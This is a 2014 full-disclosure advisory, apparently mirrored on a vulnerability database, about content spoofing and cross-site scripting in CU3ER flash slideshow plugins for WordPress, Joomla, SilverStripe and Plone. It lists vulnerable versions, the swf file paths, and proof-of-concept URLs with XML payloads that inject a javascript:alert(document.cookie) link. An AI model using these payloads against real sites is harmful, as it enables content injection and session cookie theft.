Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:30598
HistoryMay 04, 2014 - 12:00 a.m.

Vulnerabilities in plugins with CU3ER for WordPress, Joomla, SilverStripe and Plone

2014-05-0400:00:00
vulners.com
39
JSON

Hello 3APA3A!

Recently I disclosed vulnerabilities in CU3ER (http://seclists.org/fulldisclosure/2014/Apr/244). This is popular flash file and in Google's index there are up to million web sites with it (inurl:cu3er.swf filetype:swf - now Google shows 994000 results).

There are any plugins for different CMS with CU3ER. These are Content Spoofing and Cross-Site Scripting vulnerabilities in plugins with CU3ER for WordPress, Joomla, SilverStripe and Plone. Such plugins as: wpCU3ER for WordPress, jCU3ER and Vinaora Cu3er 3D Slide-show for Joomla, cu3er-silverstripe-extension for SilverStripe, collective.cu3er for Plone.

Affected products:

Vulnerable are all plugins with flash file of CU3ER.

Vulnerable are wpCU3ER 0.75 and previous versions.

Vulnerable are jCU3ER 0.12 and previous versions.

Vulnerable are Vinaora Cu3er 3D Slide-show 1.2.1, 2.5.3, 3.1.1 and previous versions.

Vulnerable are all versions of cu3er-silverstripe-extension.

Vulnerable are collective.cu3er 0.1 and previous versions.

Affected vendors:

MADEBYPLAY (wpCU3ER and jCU3ER)
http://getcu3er.com

Vinaora
http://code.google.com/p/vinaora-3d-slideshow

Matt Clegg
http://www.silverstripe.org/cu3er-silverstripe-extension-module

Thomas Massmann
https://pypi.python.org/pypi/collective.cu3er/0.1

Details:

Path to flash-file in different plugins:

http://site/wp-content/uploads/wpcu3er/CU3ER.swf
In old versions of the plugin:
http://site/wp-content/plugins/wp-cu3er/cu3er.swf
http://site/wp-content/plugins/wp-cu3er/assets/cu3er/cu3er.swf

http://site/components/com_cu3er/flash/CU3ER.swf

http://site/media/mod_vinaora_cu3er/flash/cu3er.swf

http://site/cu3er-silverstripe-extension/flash/cu3er.swf

http://site/collective/cu3er/browser/flash/cu3er.swf

The first two plugins use the last version of CU3ER, and three others use version 0.9.2 (and also in old versions of wp-cu3er).

Content Spoofing (Content Injection) (WASC-12):

http://site/cu3er.swf?xml=http://site2/1.xml

File 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>http://websecurity.com.ua</link>
</slide>
</slides>
</cu3er>

Cross-Site Scripting (WASC-08):

http://site/cu3er.swf?xml=http://site2/xss.xml

File xss.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>javascript:alert(document.cookie)</link>
</slide>
</slides>
</cu3er>

For cross-domain attacks it's needed to have crossdomain.xml at web site with xml-files.

These are examples of CS and XSS attacks on version CU3ER 0.9.2. For the last version 1.24 it's needed different xml-files and different parameter is set to flash-file.

Content Spoofing (WASC-12):

http://site/cu3er.swf?xml_location=http://site2/1.xml

File 1.xml:

<data>
<project_settings>
<width>800</width>
<height>600</height>
</project_settings>
<settings>
<folder_images>/</folder_images>
<start_slide>1</start_slide>
<auto_play>true</auto_play>
<randomize_slides>false</randomize_slides>
<pause_on_rollover>true</pause_on_rollover>
</settings>
<preloader type="linear" align_pos="MC" width="200" height="20" x="0" y="0">
</preloader>
<controls>
<prev_button align_pos="BR" width="30" height="30" x="-51" y="-20">
<auto_hide time="3">false</auto_hide>
<hide_on_transition>true</hide_on_transition>
<background round_corners="15,0,0,15">
<tweenShow tint="0xffffff" alpha="0.2" x="0" y="0" scaleX="1" scaleY="1"/>
<tweenOver tint="0xffffff" alpha="0.9" x="0" y="0" scaleX="1" scaleY="1"/>
<tweenHide tint="0xffffff" alpha="0" x="0" y="0" scaleX="1" scaleY="1"/>
</background>
<symbol type="2" align_pos="MC" x="0" y="0">
<tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
<tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/>
<tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/>
</symbol>
</prev_button>
<next_button align_pos="BR" width="30" height="30" x="-20" y="-20">
<auto_hide time="3">false</auto_hide>
<hide_on_transition>true</hide_on_transition>
<background round_corners="0,15,15,0">
<tweenShow tint="0xffffff" alpha="0.2" x="0" y="0"/>
<tweenOver tint="0xffffff" alpha="0.9"/>
<tweenHide tint="0xffffff" alpha="0"/>
</background>
<symbol type="2" align_pos="MC" x="0" y="0">
<tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
<tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/>
<tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/>
</symbol>
</next_button>
</controls>
<defaults>
<slide time="5" color="0x000000">
<image align_pos="MC" x="0" y="0" scaleX="1" scaleY="1"/>
<link>http://websecurity.com.ua</link>
</slide>
</defaults>
<slides>
<slide>
<url><![CDATA[1.jpg]]></url>
</slide>
<transition rows="3" columns="5"/>
<slide>
<url><![CDATA[1.jpg]]></url>
</slide>
</slides>
</data>

File xss.xml:

Cross-Site Scripting (WASC-08):

http://site/cu3er.swf?xml_location=http://site2/xss.xml

File xss.xml:

<data>
<project_settings>
<width>800</width>
<height>600</height>
</project_settings>
<settings>
<folder_images>/</folder_images>
<start_slide>1</start_slide>
<auto_play>true</auto_play>
<randomize_slides>false</randomize_slides>
<pause_on_rollover>true</pause_on_rollover>
</settings>
<preloader type="linear" align_pos="MC" width="200" height="20" x="0" y="0">
</preloader>
<controls>
<prev_button align_pos="BR" width="30" height="30" x="-51" y="-20">
<auto_hide time="3">false</auto_hide>
<hide_on_transition>true</hide_on_transition>
<background round_corners="15,0,0,15">
<tweenShow tint="0xffffff" alpha="0.2" x="0" y="0" scaleX="1" scaleY="1"/>
<tweenOver tint="0xffffff" alpha="0.9" x="0" y="0" scaleX="1" scaleY="1"/>
<tweenHide tint="0xffffff" alpha="0" x="0" y="0" scaleX="1" scaleY="1"/>
</background>
<symbol type="2" align_pos="MC" x="0" y="0">
<tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
<tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/>
<tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/>
</symbol>
</prev_button>
<next_button align_pos="BR" width="30" height="30" x="-20" y="-20">
<auto_hide time="3">false</auto_hide>
<hide_on_transition>true</hide_on_transition>
<background round_corners="0,15,15,0">
<tweenShow tint="0xffffff" alpha="0.2" x="0" y="0"/>
<tweenOver tint="0xffffff" alpha="0.9"/>
<tweenHide tint="0xffffff" alpha="0"/>
</background>
<symbol type="2" align_pos="MC" x="0" y="0">
<tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
<tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/>
<tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/>
</symbol>
</next_button>
</controls>
<defaults>
<slide time="5" color="0x000000">
<image align_pos="MC" x="0" y="0" scaleX="1" scaleY="1"/>
<link>javascript:alert(document.cookie)</link>
</slide>
</defaults>
<slides>
<slide>
<url><![CDATA[1.jpg]]></url>
</slide>
<transition rows="3" columns="5"/>
<slide>
<url><![CDATA[1.jpg]]></url>
</slide>
</slides>
</data>

Timeline:

2013.11.22 - announced at my site about CU3ER.
2013.11.26 - informed developer.
2013.11.26 - announced at my site about plugins. Later informed developers of the plugins.
2014.04.18 - disclosed at my site (http://websecurity.com.ua/6893/&#41;.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

JSON